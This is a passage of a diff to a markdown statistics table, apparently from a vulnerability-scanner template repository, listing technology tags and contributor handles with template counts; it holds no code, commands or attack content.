| | +| abstractapi | 13 | swissky | 3 | | | | | | | +| fortigate | 13 | yuzhe-zhang-0 | 3 | | | | | | | +| azure | 13 | alifathi-h1 | 3 | | | | | | | +| creds-stuffing | 13 | andydoering | 3 | | | | | | | +| login-check | 13 | fyoorer | 3 | | | | | | | +| osint-political | 13 | whoever | 3 | | | | | | | +| backdoor | 12 | binaryfigments | 3 | | | | | | | +| kafka | 12 | impramodsargar | 3 | | | | | | | +| auth | 12 | arcc | 3 | | | | | | | +| dashboard | 12 | atomiczsec | 3 | | | | | | | +| netsweeper | 12 | davidmckennirey | 3 | | | | | | | +| drupal | 12 | z3bd | 3 | | | | | | | +| ruby | 12 | vagnerd | 3 | | | | | | | +| rails | 12 | yash anand @yashanand155 | 3 | | | | | | | +| webserver | 12 | kazet | 3 | | | | | | | +| airflow | 12 | dudez | 3 | | | | | | | +| git | 12 | shifacyclewala | 3 | | | | | | | +| grafana | 12 | vavkamil | 2 | | | | | | | +| vpn | 12 | shelled | 2 | | | | | | | +| graphql | 12 | manas_harsh | 2 | | | | | | | +| microweber | 12 | convisoappsec | 2 | | | | | | | +| netgear | 12 | g4l1t0 | 2 | | | | | | | +| ruijie | 12 | moritz nentwig | 2 | | | | | | | +| setup | 11 | kre80r | 2 | | | | | | | +| coldfusion | 11 | zomsop82 | 2 | | | | | | | +| osint-video | 11 | kiblyn11 | 2 | | | | | | | +| cnvd2021 | 11 | joeldeleep | 2 | | | | | | | +| npm | 11 | supras | 2 | | | | | | | +| enum | 11 | ricardo maia (brainfork) | 2 | | | | | | | +| docker | 11 | thezakman | 2 | | | | | | | +| xstream | 11 | paradessia | 2 | | | | | | | +| phpmyadmin | 11 | notnotnotveg | 2 | | | | | | | +| cisa | 11 | heeress | 2 | | | | | | | +| online-fire-reporting | 11 | wa1tf0rme | 2 | | | | | | | +| ssti | 10 | socketz | 2 | | | | | | | +| jolokia | 10 | j3ssie | 2 | | | | | | | +| glpi | 10 | afaq | 2 | | | | | | | +| spring | 10 | 0xcrypto | 2 | | | | | | | +| symfony | 10 | hetroublemakr | 2 | | | | | | | +| ssh | 10 | k11h-de | 2 | | | | | | | +| dedecms | 10 | sy3omda | 2 | | | | | | | +| dell | 10 | hackerarpan | 2 | | | | | | | +| zimbra | 10 | 0xrudra | 2 | | | | | | | +| django | 10 | smaranchand | 2 | | | | | | | +| solarview | 10 | streetofhackerr007 | 2 | | | | | | | +| digitalocean | 10 | nuk3s3c | 2 | | | | | | | +| sonicwall | 10 | udit_thakkur | 2 | | | | | | | +| headless | 10 | ree4pwn | 2 | | | | | | | +| opencats | 9 | randomrobbie | 2 | | | | | | | +| thinkphp | 9 | foulenzer | 2 | | | | | | | +| windows | 9 | y4er | 2 | | | | | | | +| vcenter | 9 | sinkettu | 2 | | | | | | | +| gitea | 9 | bananabr | 2 | | | | | | | +| scada | 9 | brenocss | 2 | | | | | | | +| kube | 9 | luci | 2 | | | | | | | +| fastjson | 9 | thardt-praetorian | 2 | | | | | | | +| redis | 9 | raesene | 2 | | | | | | | +| osint-news | 9 | rafaelwdornelas | 2 | | | | | | | +| installer | 9 | n-thumann | 2 | | | | | | | +| wso2 | 9 | w4cky_ | 2 | | | | | | | +| cache | 9 | x1m_martijn | 2 | | | | | | | +| iis | 9 | 0xnirvana | 2 | | | | | | | +| zabbix | 9 | dheerajmadhukar | 2 | | | | | | | +| sitecore | 9 | dogancanbakir | 2 | | | | | | | +| firebase | 9 | nvn1729 | 2 | | | | | | | +| bypass | 9 | bhutch | 2 | | | | | | | +| pfsense | 9 | nkxxkn | 2 | | | | | | | +| prometheus | 9 | martincodes-de | 2 | | | | | | | +| versa | 9 | 666asd | 2 | | | | | | | +| crlf | 8 | cckuakilong | 2 | | | | | | | +| recon | 8 | joshlarsen | 2 | | | | | | | +| jetbrains | 8 | 8arthur | 2 | | | | | | | +| console | 8 | koti2 | 2 | | | | | | | +| bucket | 8 | v0idc0de | 2 | | | | | | | +| spotweb | 8 | lotusdll | 2 | | | | | | | +| ognl | 8 | dahse89 | 2 | | | | | | | | cnvd2020 | 8 | codexlynx | 2 | | | | | | | -| crlf | 8 | randomdhiraj | 2 | | | | | | | -| db | 8 | kre80r | 2 | | | | | | | -| cisco-switch | 8 | ehsahil | 2 | | | | | | | -| emerge | 8 | sy3omda | 2 | | | | | | | -| solr | 8 | dheerajmadhukar | 2 | | | | | | | -| mirai | 8 | k11h-de | 2 | | | | | | | -| oauth | 8 | v0idc0de | 2 | | | | | | | -| ognl | 8 | coldfish | 2 | | | | | | | -| config-audit | 8 | 0xelkomy | 2 | | | | | | | -| console | 8 | 0xsapra | 2 | | | | | | | -| maps | 7 | parth | 2 | | | | | | | -| fortios | 7 | 8arthur | 2 | | | | | | | -| sophos | 7 | paradessia | 2 | | | | | | | -| shopify | 7 | cocxanh | 2 | | | | | | | -| samsung | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| default-page | 7 | nkxxkn | 2 | | | | | | | -| huawei | 7 | 0xsmiley | 2 | | | | | | | -| go | 7 | shelled | 2 | | | | | | | -| squirrelmail | 7 | uomogrande | 2 | | | | | | | -| seeyon | 7 | maximus decimus | 2 | | | | | | | -| manager | 7 | convisoappsec | 2 | | | | | | | -| avtech | 7 | kazet | 2 | | | | | | | -| nodejs | 7 | nybble04 | 2 | | | | | | | -| blind | 7 | israel comazzetto dos reis | 2 | | | | | | | -| websphere | 7 | nvn1729 | 2 | | | | | | | -| nagiosxi | 7 | luci | 2 | | | | | | | -| ofbiz | 7 | 0xcrypto | 2 | | | | | | | -| gogs | 7 | z0ne | 2 | | | | | | | -| exchange | 7 | gevakun | 2 | | | | | | | -| nagios | 7 | smaranchand | 2 | | | | | | | -| liferay | 6 | sbani | 2 | | | | | | | -| opensis | 6 | bsysop | 2 | | | | | | | -| vms | 6 | ree4pwn | 2 | | | | | | | -| leak | 6 | amsda | 2 | | | | | | | -| activemq | 6 | ricardo maia (brainfork) | 2 | | | | | | | -| newrelic | 6 | wa1tf0rme | 2 | | | | | | | -| s3 | 6 | duty_1g | 1 | | | | | | | -| odoo | 6 | undefl0w | 1 | | | | | | | -| mongodb | 6 | alex | 1 | | | | | | | -| python | 6 | freakyclown | 1 | | | | | | | -| nexus | 6 | 0xtavian | 1 | | | | | | | -| microstrategy | 6 | esonhugh | 1 | | | | | | | -| keycloak | 6 | exceed | 1 | | | | | | | -| solarwinds | 6 | bughuntersurya | 1 | | | | | | | -| kubelet | 6 | open-sec | 1 | | | | | | | -| elfinder | 6 | zeyad azima | 1 | | | | | | | -| openvpn | 6 | ynnirc | 1 | | | | | | | -| artica | 6 | couskito | 1 | | | | | | | -| jetty | 6 | amanrawat | 1 | | | | | | | -| cobbler | 6 | kagamigawa | 1 | | | | | | | -| jamf | 6 | yashanand155 | 1 | | | | | | | -| node | 6 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| bigip | 6 | pascalheidmann | 1 | | | | | | | -| pmb | 6 | fq_hsu | 1 | | | | | | | -| lucee | 6 | jbaines-r7 | 1 | | | | | | | -| vbulletin | 6 | jbertman | 1 | | | | | | | -| c2 | 6 | charanrayudu | 1 | | | | | | | -| zhiyuan | 6 | booboohq | 1 | | | | | | | -| plesk | 6 | dabla | 1 | | | | | | | -| doctor-appointment-system | 6 | ramkrishna sawant | 1 | | | | | | | -| moodle | 6 | udinchan | 1 | | | | | | | -| minio | 6 | mesaglio | 1 | | | | | | | -| slack | 6 | kr1shna4garwal | 1 | | | | | | | -| filemanager | 6 | naglis | 1 | | | | | | | -| database | 6 | jaskaran | 1 | | | | | | | -| symantec | 6 | pdp | 1 | | | | | | | -| rconfig | 6 | j3ssie/geraldino2 | 1 | | | | | | | -| fpd | 6 | kareemse1im | 1 | | | | | | | -| magmi | 6 | hanlaomo | 1 | | | | | | | -| facebook | 5 | x6263 | 1 | | | | | | | -| adminer | 5 | d0rkerdevil | 1 | | | | | | | -| nacos | 5 | shreyapohekar | 1 | | | | | | | -| firmware | 5 | calumjelrick | 1 | | | | | | | -| typo3 | 5 | ggranjus | 1 | | | | | | | -| storage | 5 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| strapi | 5 | alperenkesk | 1 | | | | | | | -| tikiwiki | 5 | carlosvieira | 1 | | | | | | | -| paypal | 5 | mr. bobo hp | 1 | | | | | | | -| rfi | 5 | davidfegyver | 1 | | | | | | | -| parallels | 5 | bywalks | 1 | | | | | | | -| apisix | 5 | majidmc2 | 1 | | | | | | | -| carrental | 5 | alexrydzak | 1 | | | | | | | -| metinfo | 5 | schniggie | 1 | | | | | | | -| ruckus | 5 | ptonewreckin | 1 | | | | | | | -| hashicorp | 5 | wabafet | 1 | | | | | | | -| scan | 5 | metascan | 1 | | | | | | | -| avideo | 5 | piyushchhiroliya | 1 | | | | | | | -| alibaba | 5 | bhutch | 1 | | | | | | | -| sql | 5 | opencirt | 1 | | | | | | | -| gocd | 5 | allenwest24 | 1 | | | | | | | -| openemr | 5 | andysvints | 1 | | | | | | | -| circarlife | 5 | djoevanka | 1 | | | | | | | -| awstats | 5 | deena | 1 | | | | | | | -| microfocus | 5 | sicksec | 1 | | | | | | | -| elastic | 5 | jcockhren | 1 | | | | | | | -| avaya | 5 | prettyboyaaditya | 1 | | | | | | | -| akamai | 5 | 0xceeb | 1 | | | | | | | -| heroku | 5 | remonsec | 1 | | | | | | | -| fatpipe | 5 | hexcat | 1 | | | | | | | -| ir | 5 | push4d | 1 | | | | | | | -| hybris | 5 | arjunchandarana | 1 | | | | | | | -| error | 5 | gtrrnr | 1 | | | | | | | -| rseenet | 5 | gboddin | 1 | | | | | | | -| 74cms | 5 | erethon | 1 | | | | | | | -| square | 5 | kchason | 1 | | | | | | | -| ec2 | 5 | viniciuspereiras | 1 | | | | | | | -| prestashop | 5 | shiar | 1 | | | | | | | -| cockpit | 5 | ahmetpergamum | 1 | | | | | | | -| cacti | 5 | blckraven | 1 | | | | | | | -| prtg | 4 | 1nf1n7y | 1 | | | | | | | -| thinkcmf | 4 | manuelbua | 1 | | | | | | | -| bitbucket | 4 | 0h1in9e | 1 | | | | | | | -| cnvd2019 | 4 | retr02332 | 1 | | | | | | | -| springcloud | 4 | apt-mirror | 1 | | | | | | | -| phpinfo | 4 | shiva (strobes security) | 1 | | | | | | | -| roxy | 4 | xshuden | 1 | | | | | | | -| osint-archived | 4 | dwbzn | 1 | | | | | | | -| axigen | 4 | bugvsme | 1 | | | | | | | -| ldap | 4 | houdinis | 1 | | | | | | | -| sangfor | 4 | tim_koopmans | 1 | | | | | | | -| jupyter | 4 | tea | 1 | | | | | | | -| caucho | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| wcs | 4 | ahmed sherif | 1 | | | | | | | -| dropbear | 4 | danigoland | 1 | | | | | | | -| yeswiki | 4 | borna nematzadeh | 1 | | | | | | | -| nextjs | 4 | ratnadip gajbhiye | 1 | | | | | | | -| phppgadmin | 4 | pry0cc | 1 | | | | | | | -| newstatpress | 4 | lamscun | 1 | | | | | | | -| linkerd | 4 | regala_ | 1 | | | | | | | -| sendgrid | 4 | osamahamad | 1 | | | | | | | -| terramaster | 4 | wlayzz | 1 | | | | | | | -| horde | 4 | akshansh | 1 | | | | | | | -| gnuboard | 4 | ola456 | 1 | | | | | | | -| kentico | 4 | dk999 | 1 | | | | | | | -| postmessage | 4 | ransomsec | 1 | | | | | | | -| kibana | 4 | kurohost | 1 | | | | | | | -| voip | 4 | zinminphy0 | 1 | | | | | | | -| geoserver | 4 | fopina | 1 | | | | | | | -| cve2007 | 4 | kba@sogeti_esec | 1 | | | | | | | -| mostra | 4 | rschio | 1 | | | | | | | -| telerik | 4 | infosecsanyam | 1 | | | | | | | -| asp | 4 | evan rubinstien | 1 | | | | | | | -| mautic | 4 | noamrathaus | 1 | | | | | | | -| panos | 4 | aceseven (digisec360) | 1 | | | | | | | -| stripe | 4 | notsoevilweasel | 1 | | | | | | | -| photo | 4 | marcos_iaf | 1 | | | | | | | -| concrete | 4 | 5up3r541y4n | 1 | | | | | | | -| tokens | 4 | 0xceba | 1 | | | | | | | -| hongdian | 4 | exid | 1 | | | | | | | -| zte | 4 | william söderberg @ withsecure | 1 | | | | | | | -| zend | 4 | omarkurt | 1 | | | | | | | -| froxlor | 4 | breno_css | 1 | | | | | | | -| bmc | 4 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| sonarqube | 4 | imhunterand | 1 | | | | | | | -| webmin | 4 | natto97 | 1 | | | | | | | -| arcgis | 4 | mihhailsokolov | 1 | | | | | | | -| oa | 4 | geraldino2 | 1 | | | | | | | -| tls | 4 | sickwell | 1 | | | | | | | -| nosqli | 4 | mah3sec_ | 1 | | | | | | | -| umbraco | 4 | kiransau | 1 | | | | | | | -| puppet | 4 | xcapri | 1 | | | | | | | -| httpd | 4 | revblock | 1 | | | | | | | -| hikvision | 4 | dale clarke | 1 | | | | | | | -| consul | 4 | unkl4b | 1 | | | | | | | -| centos | 4 | 2rs3c | 1 | | | | | | | -| mlflow | 4 | orpheus | 1 | | | | | | | -| openfire | 4 | noraj | 1 | | | | | | | -| mostracms | 4 | ramondunker | 1 | | | | | | | -| royalevent | 4 | p-l- | 1 | | | | | | | -| jellyfin | 4 | thebinitghimire | 1 | | | | | | | -| hoteldruid | 4 | patralos | 1 | | | | | | | -| tenda | 4 | nagli | 1 | | | | | | | -| couchdb | 4 | b0rn2r00t | 1 | | | | | | | -| aspose | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| flink | 4 | elmahdi | 1 | | | | | | | -| seagate | 4 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| elementor | 4 | patrick pirker | 1 | | | | | | | -| mailchimp | 4 | mrcl0wnlab | 1 | | | | | | | -| pixie | 4 | paper-pen | 1 | | | | | | | -| pentaho | 4 | retr0 | 1 | | | | | | | -| vrealize | 4 | 0xh7ml | 1 | | | | | | | -| ampache | 4 | dmartyn | 1 | | | | | | | -| artifactory | 4 | bjhulst | 1 | | | | | | | -| ems | 4 | becivells | 1 | | | | | | | -| mikrotik | 4 | dawid-czarnecki | 1 | | | | | | | -| redmine | 4 | marcio mendes | 1 | | | | | | | -| kevinlab | 4 | aresx | 1 | | | | | | | -| telesquare | 4 | j33n1k4 | 1 | | | | | | | -| search | 4 | toufik-airane | 1 | | | | | | | -| powerjob | 4 | jeya.seelan | 1 | | | | | | | -| candidats | 4 | _c0wb0y_ | 1 | | | | | | | -| log | 4 | luqman | 1 | | | | | | | -| rabbitmq | 4 | y0no | 1 | | | | | | | -| age-encryption | 4 | manasmbellani | 1 | | | | | | | -| beyondtrust | 4 | juliosmelo | 1 | | | | | | | -| spark | 4 | daviey | 1 | | | | | | | -| javascript | 4 | daffianfo | 1 | | | | | | | -| aura | 4 | mubassirpatel | 1 | | | | | | | -| hpe | 4 | 0xrod | 1 | | | | | | | -| mysql | 4 | dali | 1 | | | | | | | -| xmlrpc | 4 | petruknisme | 1 | | | | | | | -| goanywhere | 4 | arr0way | 1 | | | | | | | -| httpserver | 4 | soyelmago | 1 | | | | | | | -| resin | 4 | oscarintherocks | 1 | | | | | | | -| cloudflare | 4 | anon-artist | 1 | | | | | | | -| ebs | 4 | rotembar | 1 | | | | | | | -| grav | 3 | miroslavsotak | 1 | | | | | | | -| linux | 3 | higor melgaço (eremit4) | 1 | | | | | | | -| pip | 3 | willd96 | 1 | | | | | | | -| netlify | 3 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| httpbin | 3 | lethargynavigator | 1 | | | | | | | -| bitrix | 3 | higor melgaço | 1 | | | | | | | -| kingsoft | 3 | tehtbl | 1 | | | | | | | -| globalprotect | 3 | rivalsec | 1 | | | | | | | -| webadmin | 3 | lingtren | 1 | | | | | | | -| geowebserver | 3 | droberson | 1 | | | | | | | -| etcd | 3 | compr00t | 1 | | | | | | | -| zeroshell | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| codeigniter | 3 | ohlinge | 1 | | | | | | | -| monstra | 3 | ling | 1 | | | | | | | -| glassfish | 3 | flag007 | 1 | | | | | | | -| purchase-order-management-system | 3 | jub0bs | 1 | | | | | | | -| pega | 3 | furkansayim | 1 | | | | | | | -| mapbox | 3 | jc175 | 1 | | | | | | | -| fanruan | 3 | knassar702 | 1 | | | | | | | -| epson | 3 | narluin | 1 | | | | | | | -| panabit | 3 | mantissts | 1 | | | | | | | -| mcafee | 3 | th3.d1p4k | 1 | | | | | | | -| sftp | 3 | elouhi | 1 | | | | | | | -| webmail | 3 | jonathanwalker | 1 | | | | | | | -| dos | 3 | aron molnar | 1 | | | | | | | -| telnet | 3 | momen eldawakhly | 1 | | | | | | | -| teamcity | 3 | luqmaan hadia | 1 | | | | | | | -| ueditor | 3 | official_blackhat13 | 1 | | | | | | | -| pie-register | 3 | pudsec | 1 | | | | | | | -| rlm | 3 | jeya seelan | 1 | | | | | | | -| sysaid | 3 | nielsing | 1 | | | | | | | -| cve2005 | 3 | r3nz0 | 1 | | | | | | | -| lighttpd | 3 | shifacyclewla | 1 | | | | | | | -| modem | 3 | zhenwarx | 1 | | | | | | | -| gateway | 3 | ok_bye_now | 1 | | | | | | | -| ivanti | 3 | philippdelteil | 1 | | | | | | | -| kavita | 3 | 8authur | 1 | | | | | | | -| movable | 3 | ndmalc | 1 | | | | | | | -| rackn | 3 | shockwave | 1 | | | | | | | -| empirecms | 3 | ooooooo_q | 1 | | | | | | | -| apollo | 3 | lixts | 1 | | | | | | | -| influxdb | 3 | petergrifin | 1 | | | | | | | -| axis | 3 | un-fmunozs | 1 | | | | | | | -| rubygems | 3 | ilovebinbash | 1 | | | | | | | -| password | 3 | xeldax | 1 | | | | | | | -| smb | 3 | elitebaz | 1 | | | | | | | -| hsphere | 3 | liquidsec | 1 | | | | | | | -| nuuo | 3 | stupidfish | 1 | | | | | | | -| openai | 3 | mass0ma | 1 | | | | | | | -| fanwei | 3 | thelicato | 1 | | | | | | | -| wbce | 3 | bartu utku sarp | 1 | | | | | | | -| temenos | 3 | rojanrijal | 1 | | | | | | | -| tableau | 3 | whynotke | 1 | | | | | | | -| aptus | 3 | lark lab | 1 | | | | | | | -| sharepoint | 3 | cookiehanhoan | 1 | | | | | | | -| redash | 3 | dhiyaneshdki | 1 | | | | | | | -| jeesns | 3 | th3r4id | 1 | | | | | | | -| steve | 3 | makyotox | 1 | | | | | | | -| superset | 3 | hakluke | 1 | | | | | | | -| axis2 | 3 | adrianmf | 1 | | | | | | | -| saltstack | 3 | qlkwej | 1 | | | | | | | -| unifi | 3 | miryangjung | 1 | | | | | | | -| zerof | 3 | absshax | 1 | | | | | | | -| waf | 3 | udyz | 1 | | | | | | | -| fuelcms | 3 | arall | 1 | | | | | | | -| servicenow | 3 | jiheon-dev | 1 | | | | | | | -| purchase-order | 3 | jna1 | 1 | | | | | | | -| lotus | 3 | alevsk | 1 | | | | | | | -| listserv | 3 | mukundbhuva | 1 | | | | | | | -| qnap | 3 | elder tao | 1 | | | | | | | -| key | 3 | sec_hawk | 1 | | | | | | | -| harbor | 3 | topscoder | 1 | | | | | | | -| kfm | 3 | exploitation | 1 | | | | | | | -| telegram | 3 | ipanda | 1 | | | | | | | -| asus | 3 | justmumu | 1 | | | | | | | -| splunk | 3 | realexp3rt | 1 | | | | | | | -| getsimple | 3 | noobexploiter | 1 | | | | | | | -| webalizer | 3 | nobody | 1 | | | | | | | -| weiphp | 3 | bad5ect0r | 1 | | | | | | | -| digitalrebar | 3 | rubina119 | 1 | | | | | | | -| backdrop | 3 | unp4ck | 1 | | | | | | | -| dom | 3 | izn0u | 1 | | | | | | | -| ansible | 3 | akokonunes | 1 | | | | | | | -| webcam | 3 | micha3lb3n | 1 | | | | | | | -| mailgun | 3 | s1r1u5_ | 1 | | | | | | | -| securepoint | 3 | intx0x80 | 1 | | | | | | | -| openbmcs | 3 | ayadi | 1 | | | | | | | -| pypi | 3 | florianmaak | 1 | | | | | | | -| bigant | 3 | therealtoastycat | 1 | | | | | | | -| figma | 3 | hardik-rathod | 1 | | | | | | | -| magnolia | 3 | hczdmr | 1 | | | | | | | -| targa | 3 | galoget | 1 | | | | | | | -| angular | 3 | ahmed abou-ela | 1 | | | | | | | -| sugarcrm | 3 | thevillagehacker | 1 | | | | | | | -| dotcms | 3 | iphantasmic | 1 | | | | | | | -| graylog | 3 | sherlocksecurity | 1 | | | | | | | -| axway | 3 | nerrorsec | 1 | | | | | | | -| samba | 3 | pratik khalane | 1 | | | | | | | -| swagger | 3 | b4uh0lz | 1 | | | | | | | -| cluster | 3 | francescocarlucci | 1 | | | | | | | -| nuget | 3 | act1on3 | 1 | | | | | | | -| twitter | 3 | shelld3v | 1 | | | | | | | -| rocketchat | 3 | sleepingbag945 | 1 | | | | | | | -| totolink | 3 | vinit989 | 1 | | | | | | | -| thruk | 3 | clment cruchet | 1 | | | | | | | -| matrix | 3 | secthebit | 1 | | | | | | | -| fileman | 3 | tirtha_mandal | 1 | | | | | | | -| eshop | 3 | tarunkoyalwar | 1 | | | | | | | -| discourse | 3 | brabbit10 | 1 | | | | | | | -| superadmin | 3 | sak1 | 1 | | | | | | | -| jeecg | 3 | myst7ic | 1 | | | | | | | -| upload | 3 | lrtk-coder | 1 | | | | | | | -| flexvnf | 3 | barthy.koeln | 1 | | | | | | | -| mantisbt | 3 | ph33rr | 1 | | | | | | | -| postman | 3 | b0yd | 1 | | | | | | | -| kkfileview | 3 | akash.c | 1 | | | | | | | -| actuator | 3 | zsusac | 1 | | | | | | | -| ampps | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| pulsar | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| netdata | 3 | shivampand3y | 1 | | | | | | | -| synology | 3 | michael wedl | 1 | | | | | | | -| subrion | 3 | rodnt | 1 | | | | | | | -| gradle | 3 | kabirsuda | 1 | | | | | | | -| linksys | 3 | co0nan | 1 | | | | | | | -| 3cx | 3 | vicrack | 1 | | | | | | | -| carel | 3 | evolutionsec | 1 | | | | | | | -| graph | 3 | colbyjack1134 | 1 | | | | | | | -| yii | 3 | 0xd0ff9 | 1 | | | | | | | -| openstack | 3 | mhdsamx | 1 | | | | | | | -| drawio | 3 | mariam tariq | 1 | | | | | | | -| xerox | 3 | kailashbohara | 1 | | | | | | | -| dreambox | 3 | berkdusunur | 1 | | | | | | | -| yonyou | 3 | chron0x | 1 | | | | | | | -| loytec | 3 | am0nt31r0 | 1 | | | | | | | -| dolibarr | 3 | aringo | 1 | | | | | | | -| sentry | 3 | husain | 1 | | | | | | | -| trendnet | 3 | failopen | 1 | | | | | | | -| voipmonitor | 3 | amnotacat | 1 | | | | | | | -| metabase | 3 | ayadim | 1 | | | | | | | -| circleci | 3 | remi gascou (podalirius) | 1 | | | | | | | -| payara | 3 | rotemreiss | 1 | | | | | | | -| trixbox | 3 | jrolf | 1 | | | | | | | -| finecms | 3 | queencitycyber | 1 | | | | | | | -| nortek | 3 | juicypotato1 | 1 | | | | | | | -| labkey | 3 | affix | 1 | | | | | | | -| messaging | 3 | screamy | 1 | | | | | | | -| selea | 3 | _darrenmartyn | 1 | | | | | | | -| shiro | 3 | ldionmarcil | 1 | | | | | | | -| lansweeper | 3 | harshinsecurity | 1 | | | | | | | -| openam | 3 | kaizensecurity | 1 | | | | | | | -| selenium | 3 | jaimin gondaliya | 1 | | | | | | | -| clusterengine | 3 | jas37 | 1 | | | | | | | -| jfrog | 3 | caon | 1 | | | | | | | -| r-seenet | 3 | yashgoti | 1 | | | | | | | -| blockchain | 3 | aaronchen0 | 1 | | | | | | | -| bruteforce | 3 | jteles | 1 | | | | | | | -| express | 3 | bibeksapkota (sar00n) | 1 | | | | | | | -| mobileiron | 3 | hakimkt | 1 | | | | | | | -| proftpd | 3 | furkansenan | 1 | | | | | | | -| buffalo | 3 | bernardo rodrigues | 1 | | | | | | | +| unauthenticated | 8 | c3l3si4n | 2 | | | | | | | +| druid | 8 | joshua rogers | 2 | | | | | | | +| metadata | 8 | bp0lr | 2 | | | | | | | +| exchange | 8 | gal nagli | 2 | | | | | | | +| icewarp | 8 | github.com/its0x08 | 2 | | | | | | | +| oauth | 8 | bsysop | 2 | | | | | | | +| emerge | 8 | pxmme1337 | 2 | | | | | | | +| mirai | 8 | paperpen | 2 | | | | | | | +| config-audit | 8 | redteambrasil | 2 | | | | | | | +| ecology | 8 | geekby | 2 | | | | | | | +| hms | 8 | 0xprial | 2 | | | | | | | +| cisco-switch | 8 | randomdhiraj | 2 | | | | | | | +| atom | 8 | uomogrande | 2 | | | | | | | +| db | 8 | 0xsmiley | 2 | | | | | | | +| elasticsearch | 8 | ehsahil | 2 | | | | | | | +| default-page | 8 | sbani | 2 | | | | | | | +| solr | 8 | dbrwsky | 2 | | | | | | | +| smtp | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| manager | 7 | cocxanh | 2 | | | | | | | +| huawei | 7 | maximus decimus | 2 | | | | | | | +| ec2 | 7 | clarkvoss | 2 | | | | | | | +| nagiosxi | 7 | mohammedsaneem | 2 | | | | | | | +| go | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| gogs | 7 | danielmofer | 2 | | | | | | | +| seeyon | 7 | israel comazzetto dos reis | 2 | | | | | | | +| shopify | 7 | megamansec | 2 | | | | | | | +| nagios | 7 | 0xsapra | 2 | | | | | | | +| avtech | 7 | korteke | 2 | | | | | | | +| websphere | 7 | parth | 2 | | | | | | | +| maps | 7 | ajaysenr | 2 | | | | | | | +| fortios | 7 | gevakun | 2 | | | | | | | +| vbulletin | 7 | sascha brendel | 2 | | | | | | | +| malware | 7 | d4vy | 2 | | | | | | | +| squirrelmail | 7 | arm!tage | 2 | | | | | | | +| sophos | 7 | 0xelkomy | 2 | | | | | | | +| nodejs | 7 | z0ne | 2 | | | | | | | +| ofbiz | 7 | myztique | 2 | | | | | | | +| blind | 7 | kishore-hariram | 2 | | | | | | | +| samsung | 7 | lum8rjack | 2 | | | | | | | +| openvpn | 6 | bing0o | 2 | | | | | | | +| opensis | 6 | coldfish | 2 | | | | | | | +| minio | 6 | nybble04 | 2 | | | | | | | +| artica | 6 | amsda | 2 | | | | | | | +| elfinder | 6 | anon-artist | 1 | | | | | | | +| error | 6 | william söderberg @ withsecure | 1 | | | | | | | +| kubelet | 6 | ldionmarcil | 1 | | | | | | | +| activemq | 6 | lixts | 1 | | | | | | | +| mongodb | 6 | tehtbl | 1 | | | | | | | +| node | 6 | prettyboyaaditya | 1 | | | | | | | +| bigip | 6 | florianmaak | 1 | | | | | | | +| slack | 6 | bywalks | 1 | | | | | | | +| jetty | 6 | p-l- | 1 | | | | | | | +| solarwinds | 6 | zhenwarx | 1 | | | | | | | +| pmb | 6 | b0yd | 1 | | | | | | | +| plesk | 6 | whynotke | 1 | | | | | | | +| zhiyuan | 6 | cookiehanhoan | 1 | | | | | | | +| newrelic | 6 | xshuden | 1 | | | | | | | +| lucee | 6 | regala_ | 1 | | | | | | | +| python | 6 | jonathanwalker | 1 | | | | | | | +| leak | 6 | ramondunker | 1 | | | | | | | +| moodle | 6 | sinsinology | 1 | | | | | | | +| s3 | 6 | marcos_iaf | 1 | | | | | | | +| cobbler | 6 | udyz | 1 | | | | | | | +| nexus | 6 | mariam tariq | 1 | | | | | | | +| doctor-appointment-system | 6 | intx0x80 | 1 | | | | | | | +| microstrategy | 6 | ling | 1 | | | | | | | +| filemanager | 6 | blckraven | 1 | | | | | | | +| keycloak | 6 | shivampand3y | 1 | | | | | | | +| vms | 6 | kiks7 | 1 | | | | | | | +| magmi | 6 | shockwave | 1 | | | | | | | +| liferay | 6 | kurohost | 1 | | | | | | | +| jamf | 6 | juicypotato1 | 1 | | | | | | | +| fpd | 6 | dabla | 1 | | | | | | | +| odoo | 6 | berkdusunur | 1 | | | | | | | +| symantec | 6 | flag007 | 1 | | | | | | | +| rconfig | 6 | droberson | 1 | | | | | | | +| paypal | 5 | _harleo | 1 | | | | | | | +| gocd | 5 | naglis | 1 | | | | | | | +| cacti | 5 | pry0cc | 1 | | | | | | | +| square | 5 | oscarintherocks | 1 | | | | | | | +| avideo | 5 | hakluke | 1 | | | | | | | +| microfocus | 5 | arjunchandarana | 1 | | | | | | | +| alibaba | 5 | 0ut0fb4nd | 1 | | | | | | | +| facebook | 5 | remonsec | 1 | | | | | | | +| parallels | 5 | noamrathaus | 1 | | | | | | | +| carrental | 5 | opencirt | 1 | | | | | | | +| awstats | 5 | paper-pen | 1 | | | | | | | +| prestashop | 5 | am0nt31r0 | 1 | | | | | | | +| akamai | 5 | ohlinge | 1 | | | | | | | +| database | 5 | couskito | 1 | | | | | | | +| heroku | 5 | mbmy | 1 | | | | | | | +| sql | 5 | alevsk | 1 | | | | | | | +| strapi | 5 | ayadi | 1 | | | | | | | +| typo3 | 5 | dievus | 1 | | | | | | | +| 74cms | 5 | hakimkt | 1 | | | | | | | +| circarlife | 5 | philippdelteil | 1 | | | | | | | +| hashicorp | 5 | fmunozs | 1 | | | | | | | +| firmware | 5 | b4uh0lz | 1 | | | | | | | +| hybris | 5 | 2rs3c | 1 | | | | | | | +| adminer | 5 | lamscun | 1 | | | | | | | +| rseenet | 5 | petruknisme | 1 | | | | | | | +| resin | 5 | rivalsec | 1 | | | | | | | +| geoserver | 5 | hexcat | 1 | | | | | | | +| tikiwiki | 5 | michael wedl | 1 | | | | | | | +| nacos | 5 | 0xh7ml | 1 | | | | | | | +| avaya | 5 | jrolf | 1 | | | | | | | +| caucho | 5 | affix | 1 | | | | | | | +| storage | 5 | pascalheidmann | 1 | | | | | | | +| openemr | 5 | queencitycyber | 1 | | | | | | | +| metinfo 